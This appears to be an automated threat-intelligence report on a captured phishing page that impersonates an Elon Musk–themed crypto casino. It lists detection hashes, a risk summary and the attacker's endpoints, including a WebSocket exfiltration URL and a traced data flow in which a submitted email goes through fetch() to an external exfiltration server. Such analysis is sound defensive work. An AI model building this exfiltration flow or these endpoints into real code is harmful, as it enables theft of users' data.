Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1F67418BFA72812B9E105C7DCC952A034316E24FE3B6186E4F7198F36B118CDD9869D93 |
|
CONTENT
ssdeep
|
1536:4F+6yc9BoUpQ5rTADK7awVJA4E11gXqFM3UBWXc9BoUpQ5AWtS/OWIbZcTeYzbmi:Rc9HQqeVJA4E118c9HQU/yg88QB6 |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
939939e6a66c6c85 |
|
VISUAL
aHash
|
362c3c043e3c2c3c |
|
VISUAL
dHash
|
e4d9d0c4e4c4d8dc |
|
VISUAL
wHash
|
163c7c347e3c2c3c |
|
VISUAL
colorHash
|
30003600000 |
|
VISUAL
cropResistant
|
e4d9d0c4e4c4d8dc |
โข Threat: Phishing
โข Target: Crypto Enthusiasts
โข Method: Impersonation and Social Engineering
โข Exfil: wss://gambler-work.com/api/ws (WebSocket URL)
โข Indicators: Recent domain, Elon Musk association, Obfuscation
โข Risk: HIGH
The site attempts to lure users into providing information by impersonating a crypto casino, and associating itself with Elon Musk. It offers bonuses and uses language common in the crypto space.
The website uses social engineering tactics, such as creating a sense of urgency through 'exclusive bonus' to encourage users to provide data. The association with Elon Musk increases the likelihood of users trusting the site.
User fills <input name='email'> โ submitForm() โ fetch('https://elongamb.cc/api/exfiltrate') โ data sent to external server
User fills <input name='email'> โ submitForm() โ fetch('https://elongamb.cc/api/exfiltrate') โ data sent to external server
_next/static/chunks/app/layout-2344be9881d79b44.jssendDatasubmitFormpixel_id
Pages with identical visual appearance (based on perceptual hash)